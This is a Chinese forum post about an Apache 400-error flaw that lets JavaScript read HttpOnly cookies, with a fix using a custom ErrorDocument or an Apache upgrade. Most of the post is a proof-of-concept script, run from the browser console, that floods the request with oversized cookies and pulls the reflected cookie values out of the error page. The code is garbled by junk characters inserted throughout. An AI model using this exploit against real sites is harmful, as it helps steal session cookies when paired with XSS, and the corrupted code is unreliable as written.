很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。7 X3 d2 Z8 A; f0 ^
% i4 N- B; R6 e% S4 U g3 }9 s用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
% S8 E) s A( {. w% R! K5 ~ 0 z3 Q9 q. {: s5 S
2 C2 Y. n: N9 U// http://www.exploit-db.com/exploits/18442/# V& k! R2 Z: B- I7 g
function setCookies (good) { C; e% \) G3 r& ]/ ^" I
// Construct string for cookie value x# p8 u8 l+ |6 e2 R, h! r6 `
var str = "";. W9 s ^$ i% G. p1 T7 b D, f
for (var i=0; i< 819; i++) {: a6 Z" b: K" W* u7 L+ q
str += "x";. V' `0 p/ V# j6 e) |
}; ?6 e( I& j6 A" g: x: d
// Set cookies. f5 @7 K6 u5 W" a
for (i = 0; i < 10; i++) {) O0 X5 @# ^' h
// Expire evil cookie
; h& {. H% M1 @& `if (good) {
' t+ K) j, P- f2 }var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";$ h4 G2 I r6 J! h
}
( s4 N/ R" d% q% L+ L// Set evil cookie
1 g& p7 Z5 Q, i! \: W8 m# {else {9 I5 q; }# Y3 T) c
var cookie = "xss"+i+"="+str+";path=/";
. }% y+ N7 k" M; t ^4 |}
j' I9 k" P+ P5 cdocument.cookie = cookie;+ \2 N) X) a# I9 f- J
}
) x) Q( e8 `, q9 [/ u0 H3 v}
1 y+ D( ?' r6 o4 Pfunction makeRequest() {
# c+ p, V1 o1 \0 l' DsetCookies();
M% k1 `$ }6 F6 b' i0 Rfunction parseCookies () {+ ?' X( ]! W1 f9 b, I3 Q
var cookie_dict = {};
7 P: H n) `% M% Q% c( Z// Only react on 400 status. R: m H3 [6 j- ]
if (xhr.readyState === 4 && xhr.status === 400) {
2 q; h2 e( Q5 S1 ~, I$ ^+ [, j2 E8 b// Replace newlines and match <pre> content
" Y/ L0 [ s% D, L+ Vvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);, |5 f* U3 B( l) ?9 Z! j6 F, v' I
if (content.length) {
0 k3 j5 K& F7 F// Remove Cookie: prefix, b' k. _5 T" o1 v( U0 Y( Q" P
content = content[1].replace("Cookie: ", "");& e2 A( |/ S+ s L
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
Y1 ^, g3 J' b! C5 W( [6 c8 j// Add cookies to object
2 i# f( K) Q8 \% I! ^( kfor (var i=0; i<cookies.length; i++) {. D( b- w" I3 n6 [2 ?
var s_c = cookies.split('=',2); v% r: u: j4 ^- O1 I3 f$ i
cookie_dict[s_c[0]] = s_c[1];3 z& w) C2 u( d, M
}3 k6 s$ U7 |. L, t1 j- E, A; F2 }
}2 G9 N- g6 M( v0 t' W
// Unset malicious cookies$ J4 [, g9 `# K6 V
setCookies(true);
M5 e I1 X! m( Valert(JSON.stringify(cookie_dict));
( z% C, q5 c) C0 l. m}/ I4 H; _) J2 x+ A9 q4 u, {3 g: h
}
" ?! W- ] v6 B0 U6 f- Y// Make XHR request
$ R0 Y Q0 u- _) Dvar xhr = new XMLHttpRequest();
& H: E& I, }5 ~. J' K1 S0 J( o: Qxhr.onreadystatechange = parseCookies;
+ W& ^8 ]+ u5 S0 _xhr.open("GET", "/", true);; F# W4 s2 F+ c5 q' I+ |8 w% Z
xhr.send(null);# S2 q. i0 }7 s7 @- |. N( P
}6 N/ S& k! x+ x* A8 u7 Y5 u
makeRequest();
) e- N, z9 o9 S
" i o v- p$ e: C你就能看见华丽丽的400错误包含着cookie信息。
2 `3 X5 P9 ~7 }3 E7 D
$ y) u8 q/ E' p) y& J! }下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#2 A6 m9 H, V4 P
+ M8 W1 u9 m& {' N" l
修复方案: ]7 F1 I7 r: N7 d! b, a& s+ {: }
6 i& u# }) I" C KApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
, D& e1 r4 l, f3 _* l; Q
( j. P, v5 v5 ~- ZIn the event of a problem or error, Apachecan be configured to do one of four things,
) g) h4 Y* x% @1 U! H5 u
+ J. H& a; g0 B1. output asimple hardcoded error message输出一个简单生硬的错误代码信息7 u. Q) d& Y! F" ^4 d" J8 s
2. output acustomized message输出一段信息
% M/ ] [4 h9 k1 o3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 & C7 Z& o; z$ G
4. redirect to an external URL to handle theproblem/error转向一个外部URL
$ p8 L# A& ?& J6 j& r
2 w" A7 q1 _. B5 O& d经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
: i/ R( f& a# b0 D# Z: d! A& L$ K2 z) o5 ^8 W0 C
Apache配置:
2 ?8 ~( A" V* {' s) P) n' Y
6 K# Q' J1 R$ fErrorDocument400 " security test"
" c& u0 N* Y. O1 {2 y+ B0 c$ u: L& o5 O* {9 s" b
当然,升级apache到最新也可:)。
1 s* @; {/ Q: ?; F; z% G
. h: S) H: y; M. e; w参考:http://httpd.apache.org/security/vulnerabilities_22.html2 b8 H7 D% d. R/ a# [5 D
( [6 C5 n% ]% @! D9 {
|
发表于 2013-4-19 19:15:43
收藏
支持
反对